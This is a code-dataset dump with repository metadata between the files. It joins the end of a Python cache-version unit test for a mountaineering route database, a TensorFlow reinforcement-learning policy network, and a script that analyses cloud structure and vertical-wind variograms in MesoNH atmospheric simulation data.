waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
route = Route(activities=['skitouring'])
outing = Outing(
activities=['skitouring'],
date_start=datetime.date(2016, 2, 1),
date_end=datetime.date(2016, 2, 1))
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated,
route, outing])
self.session.flush()
self.session.add(Association.create(waypoint1, route))
self.session.add(Association.create(waypoint2, waypoint1))
self.session.add(Association.create(waypoint3, waypoint2))
self.session.flush()
update_cache_version_associations([], [
{'parent_id': route.document_id, 'parent_type': ROUTE_TYPE,
'child_id': outing.document_id, 'child_type': OUTING_TYPE}
])
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_route = self.session.query(CacheVersion).get(
route.document_id)
cache_version_outing = self.session.query(CacheVersion).get(
outing.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_route.version, 2)
self.assertEqual(cache_version_outing.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_for_area(self):
waypoint = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
area = Area()
self.session.add_all([waypoint, waypoint_unrelated, area])
self.session.flush()
self.session.add(AreaAssociation(
document_id=waypoint.document_id, area_id=area.document_id))
self.session.flush()
update_cache_version_for_area(area)
cache_version_waypoint = self.session.query(CacheVersion).get(
waypoint.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
cache_version_area = self.session.query(CacheVersion).get(
area.document_id)
self.assertEqual(cache_version_waypoint.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
# the cache key of the area is also not updated!
self.assertEqual(cache_version_area.version, 1)
def test_update_cache_version_for_map(self):
waypoint = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
topo_map = TopoMap()
self.session.add_all([waypoint, waypoint_unrelated, topo_map])
self.session.flush()
self.session.add(TopoMapAssociation(
document_id=waypoint.document_id,
topo_map_id=topo_map.document_id))
self.session.flush()
update_cache_version_for_map(topo_map)
cache_version_waypoint = self.session.query(CacheVersion).get(
waypoint.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
cache_version_map = self.session.query(CacheVersion).get(
topo_map.document_id)
self.assertEqual(cache_version_waypoint.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
# the cache key of the map is also not updated!
self.assertEqual(cache_version_map.version, 1)
| agpl-3.0 | -5,723,569,617,226,166,000 | 42.995062 | 79 | 0.66343 | false |
xcyan/models | pcl_rl/policy.py | 13 | 16946 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Policy neural network.
Implements network which takes in input and produces actions
and log probabilities given a sampling distribution parameterization.
"""
import tensorflow as tf
import numpy as np
class Policy(object):
def __init__(self, env_spec, internal_dim,
fixed_std=True, recurrent=True,
input_prev_actions=True):
self.env_spec = env_spec
self.internal_dim = internal_dim
self.rnn_state_dim = self.internal_dim
self.fixed_std = fixed_std
self.recurrent = recurrent
self.input_prev_actions = input_prev_actions
self.matrix_init = tf.truncated_normal_initializer(stddev=0.01)
self.vector_init = tf.constant_initializer(0.0)
@property
def input_dim(self):
return (self.env_spec.total_obs_dim +
self.env_spec.total_sampled_act_dim * self.input_prev_actions)
@property
def output_dim(self):
return self.env_spec.total_sampling_act_dim
def get_cell(self):
"""Get RNN cell."""
self.cell_input_dim = self.internal_dim // 2
cell = tf.contrib.rnn.LSTMCell(self.cell_input_dim,
state_is_tuple=False,
reuse=tf.get_variable_scope().reuse)
cell = tf.contrib.rnn.OutputProjectionWrapper(
cell, self.output_dim,
reuse=tf.get_variable_scope().reuse)
return cell
def core(self, obs, prev_internal_state, prev_actions):
"""Core neural network taking in inputs and outputting sampling
distribution parameters."""
batch_size = tf.shape(obs[0])[0]
if not self.recurrent:
prev_internal_state = tf.zeros([batch_size, self.rnn_state_dim])
cell = self.get_cell()
b = tf.get_variable('input_bias', [self.cell_input_dim],
initializer=self.vector_init)
cell_input = tf.nn.bias_add(tf.zeros([batch_size, self.cell_input_dim]), b)
for i, (obs_dim, obs_type) in enumerate(self.env_spec.obs_dims_and_types):
w = tf.get_variable('w_state%d' % i, [obs_dim, self.cell_input_dim],
initializer=self.matrix_init)
if self.env_spec.is_discrete(obs_type):
cell_input += tf.matmul(tf.one_hot(obs[i], obs_dim), w)
elif self.env_spec.is_box(obs_type):
cell_input += tf.matmul(obs[i], w)
else:
assert False
if self.input_prev_actions:
if self.env_spec.combine_actions: # TODO(ofir): clean this up
prev_action = prev_actions[0]
for i, action_dim in enumerate(self.env_spec.orig_act_dims):
act = tf.mod(prev_action, action_dim)
w = tf.get_variable('w_prev_action%d' % i, [action_dim, self.cell_input_dim],
initializer=self.matrix_init)
cell_input += tf.matmul(tf.one_hot(act, action_dim), w)
prev_action = tf.to_int32(prev_action / action_dim)
else:
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
w = tf.get_variable('w_prev_action%d' % i, [act_dim, self.cell_input_dim],
initializer=self.matrix_init)
if self.env_spec.is_discrete(act_type):
cell_input += tf.matmul(tf.one_hot(prev_actions[i], act_dim), w)
elif self.env_spec.is_box(act_type):
cell_input += tf.matmul(prev_actions[i], w)
else:
assert False
output, next_state = cell(cell_input, prev_internal_state)
return output, next_state
def sample_action(self, logits, sampling_dim,
act_dim, act_type, greedy=False):
"""Sample an action from a distribution."""
if self.env_spec.is_discrete(act_type):
if greedy:
act = tf.argmax(logits, 1)
else:
act = tf.reshape(tf.multinomial(logits, 1), [-1])
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
if greedy:
act = means
else:
batch_size = tf.shape(logits)[0]
act = means + std * tf.random_normal([batch_size, act_dim])
else:
assert False
return act
def entropy(self, logits,
sampling_dim, act_dim, act_type):
"""Calculate entropy of distribution."""
if self.env_spec.is_discrete(act_type):
entropy = tf.reduce_sum(
-tf.nn.softmax(logits) * tf.nn.log_softmax(logits), -1)
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
entropy = tf.reduce_sum(
0.5 * (1 + tf.log(2 * np.pi * tf.square(std))), -1)
else:
assert False
return entropy
def self_kl(self, logits,
sampling_dim, act_dim, act_type):
"""Calculate KL of distribution with itself.
Used layer only for the gradients.
"""
if self.env_spec.is_discrete(act_type):
probs = tf.nn.softmax(logits)
log_probs = tf.nn.log_softmax(logits)
self_kl = tf.reduce_sum(
tf.stop_gradient(probs) *
(tf.stop_gradient(log_probs) - log_probs), -1)
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
my_means = tf.stop_gradient(means)
my_std = tf.stop_gradient(std)
self_kl = tf.reduce_sum(
tf.log(std / my_std) +
(tf.square(my_std) + tf.square(my_means - means)) /
(2.0 * tf.square(std)) - 0.5,
-1)
else:
assert False
return self_kl
def log_prob_action(self, action, logits,
sampling_dim, act_dim, act_type):
"""Calculate log-prob of action sampled from distribution."""
if self.env_spec.is_discrete(act_type):
act_log_prob = tf.reduce_sum(
tf.one_hot(action, act_dim) * tf.nn.log_softmax(logits), -1)
elif self.env_spec.is_box(act_type):
means = logits[:, :sampling_dim / 2]
std = logits[:, sampling_dim / 2:]
act_log_prob = (- 0.5 * tf.log(2 * np.pi * tf.square(std))
- 0.5 * tf.square(action - means) / tf.square(std))
act_log_prob = tf.reduce_sum(act_log_prob, -1)
else:
assert False
return act_log_prob
def sample_actions(self, output, actions=None, greedy=False):
"""Sample all actions given output of core network."""
sampled_actions = []
logits = []
log_probs = []
entropy = []
self_kl = []
start_idx = 0
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
sampling_dim = self.env_spec.sampling_dim(act_dim, act_type)
if self.fixed_std and self.env_spec.is_box(act_type):
act_logits = output[:, start_idx:start_idx + act_dim]
log_std = tf.get_variable('std%d' % i, [1, sampling_dim // 2])
# fix standard deviations to variable
act_logits = tf.concat(
[act_logits,
1e-6 + tf.exp(log_std) + 0 * act_logits], 1)
else:
act_logits = output[:, start_idx:start_idx + sampling_dim]
if actions is None:
act = self.sample_action(act_logits, sampling_dim,
act_dim, act_type,
greedy=greedy)
else:
act = actions[i]
ent = self.entropy(act_logits, sampling_dim, act_dim, act_type)
kl = self.self_kl(act_logits, sampling_dim, act_dim, act_type)
act_log_prob = self.log_prob_action(
act, act_logits,
sampling_dim, act_dim, act_type)
sampled_actions.append(act)
logits.append(act_logits)
log_probs.append(act_log_prob)
entropy.append(ent)
self_kl.append(kl)
start_idx += sampling_dim
assert start_idx == self.env_spec.total_sampling_act_dim
return sampled_actions, logits, log_probs, entropy, self_kl
def get_kl(self, my_logits, other_logits):
"""Calculate KL between one policy output and another."""
kl = []
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
sampling_dim = self.env_spec.sampling_dim(act_dim, act_type)
single_my_logits = my_logits[i]
single_other_logits = other_logits[i]
if self.env_spec.is_discrete(act_type):
my_probs = tf.nn.softmax(single_my_logits)
my_log_probs = tf.nn.log_softmax(single_my_logits)
other_log_probs = tf.nn.log_softmax(single_other_logits)
my_kl = tf.reduce_sum(my_probs * (my_log_probs - other_log_probs), -1)
elif self.env_spec.is_box(act_type):
my_means = single_my_logits[:, :sampling_dim / 2]
my_std = single_my_logits[:, sampling_dim / 2:]
other_means = single_other_logits[:, :sampling_dim / 2]
other_std = single_other_logits[:, sampling_dim / 2:]
my_kl = tf.reduce_sum(
tf.log(other_std / my_std) +
(tf.square(my_std) + tf.square(my_means - other_means)) /
(2.0 * tf.square(other_std)) - 0.5,
-1)
else:
assert False
kl.append(my_kl)
return kl
def single_step(self, prev, cur, greedy=False):
"""Single RNN step. Equivalently, single-time-step sampled actions."""
prev_internal_state, prev_actions, _, _, _, _ = prev
obs, actions = cur # state observed and action taken at this time step
# feed into RNN cell
output, next_state = self.core(
obs, prev_internal_state, prev_actions)
# sample actions with values and log-probs
(actions, logits, log_probs,
entropy, self_kl) = self.sample_actions(
output, actions=actions, greedy=greedy)
return (next_state, tuple(actions), tuple(logits), tuple(log_probs),
tuple(entropy), tuple(self_kl))
def sample_step(self, obs, prev_internal_state, prev_actions, greedy=False):
"""Sample single step from policy."""
(next_state, sampled_actions, logits, log_probs,
entropies, self_kls) = self.single_step(
(prev_internal_state, prev_actions, None, None, None, None),
(obs, None), greedy=greedy)
return next_state, sampled_actions
def multi_step(self, all_obs, initial_state, all_actions):
"""Calculate log-probs and other calculations on batch of episodes."""
batch_size = tf.shape(initial_state)[0]
time_length = tf.shape(all_obs[0])[0]
initial_actions = [act[0] for act in all_actions]
all_actions = [tf.concat([act[1:], act[0:1]], 0)
for act in all_actions] # "final" action is dummy
(internal_states, _, logits, log_probs,
entropies, self_kls) = tf.scan(
self.single_step,
(all_obs, all_actions),
initializer=self.get_initializer(
batch_size, initial_state, initial_actions))
# remove "final" computations
log_probs = [log_prob[:-1] for log_prob in log_probs]
entropies = [entropy[:-1] for entropy in entropies]
self_kls = [self_kl[:-1] for self_kl in self_kls]
return internal_states, logits, log_probs, entropies, self_kls
def get_initializer(self, batch_size, initial_state, initial_actions):
"""Get initializer for RNN."""
logits_init = []
log_probs_init = []
for act_dim, act_type in self.env_spec.act_dims_and_types:
sampling_dim = self.env_spec.sampling_dim(act_dim, act_type)
logits_init.append(tf.zeros([batch_size, sampling_dim]))
log_probs_init.append(tf.zeros([batch_size]))
entropy_init = [tf.zeros([batch_size]) for _ in self.env_spec.act_dims]
self_kl_init = [tf.zeros([batch_size]) for _ in self.env_spec.act_dims]
return (initial_state,
tuple(initial_actions),
tuple(logits_init), tuple(log_probs_init),
tuple(entropy_init),
tuple(self_kl_init))
def calculate_kl(self, my_logits, other_logits):
"""Calculate KL between one policy and another on batch of episodes."""
batch_size = tf.shape(my_logits[0])[1]
time_length = tf.shape(my_logits[0])[0]
reshaped_my_logits = [
tf.reshape(my_logit, [batch_size * time_length, -1])
for my_logit in my_logits]
reshaped_other_logits = [
tf.reshape(other_logit, [batch_size * time_length, -1])
for other_logit in other_logits]
kl = self.get_kl(reshaped_my_logits, reshaped_other_logits)
kl = [tf.reshape(kkl, [time_length, batch_size])
for kkl in kl]
return kl
class MLPPolicy(Policy):
"""Non-recurrent policy."""
def get_cell(self):
self.cell_input_dim = self.internal_dim
def mlp(cell_input, prev_internal_state):
w1 = tf.get_variable('w1', [self.cell_input_dim, self.internal_dim])
b1 = tf.get_variable('b1', [self.internal_dim])
w2 = tf.get_variable('w2', [self.internal_dim, self.internal_dim])
b2 = tf.get_variable('b2', [self.internal_dim])
w3 = tf.get_variable('w3', [self.internal_dim, self.internal_dim])
b3 = tf.get_variable('b3', [self.internal_dim])
proj = tf.get_variable(
'proj', [self.internal_dim, self.output_dim])
hidden = cell_input
hidden = tf.tanh(tf.nn.bias_add(tf.matmul(hidden, w1), b1))
hidden = tf.tanh(tf.nn.bias_add(tf.matmul(hidden, w2), b2))
output = tf.matmul(hidden, proj)
return output, hidden
return mlp
def single_step(self, obs, actions, prev_actions, greedy=False):
"""Single step."""
batch_size = tf.shape(obs[0])[0]
prev_internal_state = tf.zeros([batch_size, self.internal_dim])
output, next_state = self.core(
obs, prev_internal_state, prev_actions)
# sample actions with values and log-probs
(actions, logits, log_probs,
entropy, self_kl) = self.sample_actions(
output, actions=actions, greedy=greedy)
return (next_state, tuple(actions), tuple(logits), tuple(log_probs),
tuple(entropy), tuple(self_kl))
def sample_step(self, obs, prev_internal_state, prev_actions, greedy=False):
"""Sample single step from policy."""
(next_state, sampled_actions, logits, log_probs,
entropies, self_kls) = self.single_step(obs, None, prev_actions,
greedy=greedy)
return next_state, sampled_actions
def multi_step(self, all_obs, initial_state, all_actions):
"""Calculate log-probs and other calculations on batch of episodes."""
batch_size = tf.shape(initial_state)[0]
time_length = tf.shape(all_obs[0])[0]
# first reshape inputs as a single batch
reshaped_obs = []
for obs, (obs_dim, obs_type) in zip(all_obs, self.env_spec.obs_dims_and_types):
if self.env_spec.is_discrete(obs_type):
reshaped_obs.append(tf.reshape(obs, [time_length * batch_size]))
elif self.env_spec.is_box(obs_type):
reshaped_obs.append(tf.reshape(obs, [time_length * batch_size, obs_dim]))
reshaped_act = []
reshaped_prev_act = []
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
act = tf.concat([all_actions[i][1:], all_actions[i][0:1]], 0)
prev_act = all_actions[i]
if self.env_spec.is_discrete(act_type):
reshaped_act.append(tf.reshape(act, [time_length * batch_size]))
reshaped_prev_act.append(
tf.reshape(prev_act, [time_length * batch_size]))
elif self.env_spec.is_box(act_type):
reshaped_act.append(
tf.reshape(act, [time_length * batch_size, act_dim]))
reshaped_prev_act.append(
tf.reshape(prev_act, [time_length * batch_size, act_dim]))
# now inputs go into single step as one large batch
(internal_states, _, logits, log_probs,
entropies, self_kls) = self.single_step(
reshaped_obs, reshaped_act, reshaped_prev_act)
# reshape the outputs back to original time-major format
internal_states = tf.reshape(internal_states, [time_length, batch_size, -1])
logits = [tf.reshape(logit, [time_length, batch_size, -1])
for logit in logits]
log_probs = [tf.reshape(log_prob, [time_length, batch_size])[:-1]
for log_prob in log_probs]
entropies = [tf.reshape(ent, [time_length, batch_size])[:-1]
for ent in entropies]
self_kls = [tf.reshape(self_kl, [time_length, batch_size])[:-1]
for self_kl in self_kls]
return internal_states, logits, log_probs, entropies, self_kls
| apache-2.0 | 7,729,494,943,596,259,000 | 36.995516 | 87 | 0.613006 | false |
DiegoSelle/master_thesis | cloud_exploration.py | 1 | 12064 | import numpy as np
from mesonh_atm.mesonh_atmosphere import MesoNHAtmosphere
import matplotlib.pyplot as plt
from scipy.interpolate import RegularGridInterpolator
import modules.cloud as ModCloud
#Old Data without advection
path = "/net/skyscanner/volume1/data/mesoNH/ARM_OneHour3600files_No_Horizontal_Wind/"
mfiles = [path+"U0K10.1.min{:02d}.{:03d}_diaKCL.nc".format(minute, second)
for minute in range(1, 60)
for second in range(1, 61)]
mtstep = 1
atm = MesoNHAtmosphere(mfiles, 1)
font = {'size' : 26}
plt.rc('font', **font)
#######################################################################
########################### cloud example #############################
#######################################################################
# Example Data of two variables with the coordinates of a rough bounding box of a cloud
# RCT = liquid water content, WT = vertical wind
lwc_data=atm.data['RCT'][449:599,75:125,60:200,110:250]
zwind_data=atm.data['WT'][449:599,75:125,60:200,110:250]
ids,counter,clouds=ModCloud.cloud_segmentation(lwc_data)
clouds=list(set(clouds.values()))
length_point_clds = np.ndarray((0,1))
for each_cloud in clouds:
print(len(each_cloud.points))
temp = len(each_cloud.points)
length_point_clds = np.vstack((length_point_clds,temp))
# Get cloud with the biggest amount of points in the bounding box
cloud = clouds[np.argmax(length_point_clds)]
cloud.calculate_attributes(lwc_data,zwind_data)
lwc_cloud = np.zeros(lwc_data.shape)
for point in cloud.points:
lwc_cloud[point] = 1
#Coordinates of the rough bounding box of the example cloud
xr = np.arange(0.005 + 60*0.01, 0.005 + 200*0.01,0.01)
yr = np.arange(0.005 + 110*0.01, 0.005 + 250*0.01,0.01)
all_Zs = atm.data["VLEV"][:,0,0]
zr = all_Zs[75:125]
tr = np.arange(449,599)
origin_xy = [60,110]
zspan = np.arange(0,16)
# Plotting three different cross-sections including the center of geometry COG and the center of masses
# of the vertical wind and liquid water content
plt.figure()
plt.xlabel("x coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.contour(zwind_data[0,15].T,origin="lower",label='zwind',extent=[xr[0], xr[-1], yr[0], yr[-1]],linewidths=2)
cbar=plt.colorbar()
cbar.set_label('m/s')
plt.contour(lwc_cloud[0,15].T,V=[0,1],origin='lower',extent=[xr[0], xr[-1], yr[0], yr[-1]],alpha=0.6,cmap='Greys')
COG_2D = cloud.COG_2D_tz[0,15]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COG_2D[0],COG_2D[1],'ro',markersize=8,label='COG 2D')
COM_2D_zwind = cloud.COM_2D_zwind_tz[0,15]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_zwind[0],COM_2D_zwind[1],'gx',markersize=8, label='COM 2D zwind')
COM_2D_lwc = cloud.COM_2D_lwc_tz[0,15]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_lwc[0],COM_2D_lwc[1],'b>',markersize=8, label='COM 2D lwc')
plt.title("Zwind Cross-section Cloud Example, z={}km, t={}s".format(np.round(float(zr[15]),3),tr[0]))
plt.xlim(xr[0], xr[-1])
plt.ylim(yr[0], yr[-1])
plt.legend()
plt.figure()
plt.xlabel("x coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.contour(zwind_data[0,19].T,origin="lower",label='zwind',extent=[xr[0], xr[-1], yr[0], yr[-1]],linewidths=2)
cbar=plt.colorbar()
cbar.set_label('m/s')
plt.contour(lwc_cloud[0,19].T,V=[0,1],origin='lower',extent=[xr[0], xr[-1], yr[0], yr[-1]],alpha=0.6,cmap='Greys')
COG_2D = cloud.COG_2D_tz[0,19]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COG_2D[0],COG_2D[1],'ro',markersize=8,label='COG 2D')
COM_2D_zwind = cloud.COM_2D_zwind_tz[0,19]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_zwind[0],COM_2D_zwind[1],'gx',markersize=8, label='COM 2D zwind')
COM_2D_lwc = cloud.COM_2D_lwc_tz[0,19]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_lwc[0],COM_2D_lwc[1],'b>',markersize=8, label='COM 2D lwc')
plt.title("Zwind Cross-section Cloud Example, z={}km, t={}s".format(np.round(float(zr[19]),3),tr[0]))
plt.xlim(xr[0], xr[-1])
plt.ylim(yr[0], yr[-1])
plt.legend()
plt.figure()
plt.xlabel("x coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.contour(zwind_data[0,30].T,origin="lower",label='zwind',extent=[xr[0], xr[-1], yr[0], yr[-1]],linewidths=2)
cbar=plt.colorbar()
cbar.set_label('m/s')
plt.contour(lwc_cloud[0,30].T,V=[0,1],origin='lower',extent=[xr[0], xr[-1], yr[0], yr[-1]],alpha=0.6,cmap='Greys')
COG_2D = cloud.COG_2D_tz[0,30]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COG_2D[0],COG_2D[1],'ro',markersize=8,label='COG 2D')
COM_2D_zwind = cloud.COM_2D_zwind_tz[0,30]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_zwind[0],COM_2D_zwind[1],'gx',markersize=8, label='COM 2D zwind')
COM_2D_lwc = cloud.COM_2D_lwc_tz[0,30]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_lwc[0],COM_2D_lwc[1],'b>',markersize=8, label='COM 2D lwc')
plt.title("Zwind Cross-section Cloud, z={}km, t={}s".format(np.round(float(zr[30]),3),tr[0]))
plt.xlim(xr[0], xr[-1])
plt.ylim(yr[0], yr[-1])
plt.legend()
# Center of masses and Geometry, for each cross-section
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.plot(zr,cloud.COG_2D_tz[0,:,1]*0.01 + 0.005 + origin_xy[1]*0.01,label='COG 2D',linewidth=3)
plt.plot(zr,cloud.COM_2D_lwc_tz[0,:,1]*0.01 + 0.005 + origin_xy[1]*0.01, label='COM 2D lwc',linewidth=3)
plt.plot(zr,cloud.COM_2D_zwind_tz[0,:,1]*0.01 + 0.005 + origin_xy[1]*0.01, label='COM 2D zwind',linewidth=3)
plt.legend()
plt.title('Center of masses and geometry Cloud, t = {}s'.format(tr[0]))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("x coordinate(km)")
plt.plot(zr,cloud.COG_2D_tz[0,:,0]*0.01 + 0.005 + origin_xy[1]*0.01,label='COG 2D',linewidth=3)
plt.plot(zr,cloud.COM_2D_lwc_tz[0,:,0]*0.01 + 0.005 + origin_xy[1]*0.01, label='COM 2D lwc',linewidth=3)
plt.plot(zr,cloud.COM_2D_zwind_tz[0,:,0]*0.01 + 0.005 + origin_xy[1]*0.01, label='COM 2D zwind',linewidth=3)
plt.legend()
plt.title('Center of masses and geometry Cloud, t = {}s'.format(tr[0]))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Surface(100$m^2$)")
plt.plot(zr,cloud.area_cs_tz[0],linewidth=3)
plt.title('Surface Area of Cloud, t={}s'.format(tr[0]))
plt.figure()
plt.xlabel("time(s)")
plt.ylabel("Volume(1000 $m^3$)")
plt.plot(tr,cloud.volumen_t,linewidth=3)
plt.title('Volume of Cloud')
####### Visualizing max vertical wind as a function of z
zwind_maxz = np.ndarray((0,1))
for z in range(int(cloud.zmin_t[0]),int(cloud.zmax_t[0])+1):
zwind_max = np.max(zwind_data[0,z][lwc_cloud[0,z]>0])
zwind_maxz = np.vstack((zwind_maxz,zwind_max))
####### Visualizing mean vertical wind as a function of z
zwind_meanz = np.ndarray((0,1))
for z in range(int(cloud.zmin_t[0]),int(cloud.zmax_t[0])+1):
zwind_mean = np.mean(zwind_data[0,z][lwc_cloud[0,z]>0])
zwind_meanz = np.vstack((zwind_meanz,zwind_mean))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Max zwind(m/s)")
plt.plot(zr[4:],zwind_maxz,linewidth=3)
plt.title('Max Zwind per z cross-section Cloud,t={}s'.format(tr[0]))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Mean Zwind (m/s)")
plt.plot(zr[4:],zwind_meanz,linewidth=3)
plt.title('Mean Zwind per z cross-section Cloud,t={}s'.format(tr[0]))
################# Variance behaviour of vertical wind in dependence of z
zwind_varz = np.ndarray((0,1))
for z in range(int(cloud.zmin_t[0]),int(cloud.zmax_t[0])+1):
zwind_var = zwind_data[0,z][lwc_cloud[0,z]>0].var()
zwind_varz = np.vstack((zwind_varz,zwind_var))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Variance Zwind")
plt.plot(zr[4:],zwind_varz,linewidth=3)
plt.title('Mean Zwind per z cross-section Cloud,t={}s'.format(tr[0]))
##########################################
############# Variogram Analysis #########
##########################################
##############################################################
##### creating moving bounding box that follows center #######
##############################################################
xbound_max = int(np.max(cloud.xsize_t))
ybound_max = int(np.max(cloud.ysize_t))
zbound_max = int(np.max(cloud.zsize_t))
xcenter_t = (cloud.xmin_t + cloud.xmax_t)/2
ycenter_t = (cloud.ymin_t + cloud.ymax_t)/2
zcenter_t = (cloud.zmin_t + cloud.zmax_t)/2
zwind_hypercube = np.ndarray((cloud.tmax+1-cloud.tmin,zbound_max,xbound_max,ybound_max))
cloud_hypercube = np.ndarray((cloud.tmax+1-cloud.tmin,zbound_max,xbound_max,ybound_max))
total_size = lwc_cloud.shape
### Make this an attribute maybe ?
for time in range(cloud.tmin,cloud.tmax+1):
xmin = int(np.ceil(xcenter_t[time] - xbound_max/2))
xmax = int(np.ceil(xcenter_t[time] + xbound_max/2))
ymin = int(np.ceil(ycenter_t[time] - ybound_max/2))
ymax = int(np.ceil(ycenter_t[time] + ybound_max/2))
zmin = int(np.ceil(zcenter_t[time] - zbound_max/2))
zmax = int(np.ceil(zcenter_t[time] + zbound_max/2))
if xmin < 0:
xmax = xmax - xmin
xmin = 0
if ymin < 0:
ymax = ymax - ymin
ymin = 0
if zmin < 0:
zmax = zmax - zmin
zmin = 0
if xmax > total_size[2]:
xmin = xmin - (xmax-total_size[2])
xmax = total_size[2]
if ymax > total_size[3]:
ymin = ymin - (ymax-total_size[3])
ymax = total_size[3]
if zmax > total_size[1]:
zmin = zmin - (zmax-total_size[1])
zmax = total_size[1]
zwind_hypercube[time] = zwind_data[time,zmin:zmax,xmin:xmax,ymin:ymax]
cloud_hypercube[time] = lwc_cloud[time,zmin:zmax,xmin:xmax,ymin:ymax]
###########################################
##### Variogram analysis 3D and time ######
###########################################
variograms_3Dt = cloud.sample_variogram(zwind_hypercube,'classical',cloud_hypercube)
plt.figure()
plt.title("Cloud")
plt.xlabel("$h_z,h_x,h_y(10m),h_t(s)$")
plt.ylabel("$\hat{\gamma}(|h_i|)$")
plt.plot(np.append(0,variograms_3Dt["tvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_t|)$")
plt.plot(np.append(0,variograms_3Dt["zvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_z|)$")
plt.plot(np.append(0,variograms_3Dt["xvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_x|)$")
plt.plot(np.append(0,variograms_3Dt["yvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_y|)$")
plt.axhline(zwind_hypercube[cloud_hypercube>0].var())
plt.legend()
###########################################
##### Variogram analysis 2D and time ######
###########################################
# Take only one z-cross-section
zwind_hypercube2Dt = zwind_hypercube[:,15:16]
cloud_hypercube2Dt = cloud_hypercube[:,15:16]
variograms_2Dt = cloud.sample_variogram(zwind_hypercube2Dt,'classical',cloud_hypercube2Dt)
plt.figure()
plt.title("Cloud, z={}km".format(np.round(float(zr[15]),3)))
plt.xlabel("$h_x,h_y(10m),h_t(s)$")
plt.ylabel("$\hat{\gamma}(|h_i|)$")
plt.plot(np.append(0,variograms_2Dt["tvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_t|)$")
plt.plot(np.append(0,variograms_2Dt["xvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_x|)$")
plt.plot(np.append(0,variograms_2Dt["yvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_y|)$")
plt.axhline(zwind_hypercube2Dt[cloud_hypercube2Dt>0].var())
plt.legend()
##################################
##### Variogram analysis 2D ######
##################################
# Frozen z-cross-section of the bounding box
zwind_hypercube2D = zwind_hypercube[0:1,15:16]
cloud_hypercube2D = cloud_hypercube[0:1,15:16]
variograms_2D = cloud.sample_variogram(zwind_hypercube2D,'classical',cloud_hypercube2D)
plt.figure()
plt.title("Cloud, z={}km, t={}s".format(np.round(float(zr[15]),3),tr[0]))
plt.xlabel("$h_x,h_y(10m)$")
plt.ylabel("$\hat{\gamma}(|h_i|)$")
plt.plot(np.append(0,variograms_2D["xvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_x|)$")
plt.plot(np.append(0,variograms_2D["yvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_y|)$")
plt.axhline(zwind_hypercube2D[cloud_hypercube2D>0].var())
plt.legend()
| mit | 4,372,990,722,579,709,000 | 39.483221 | 114 | 0.625663 | false |
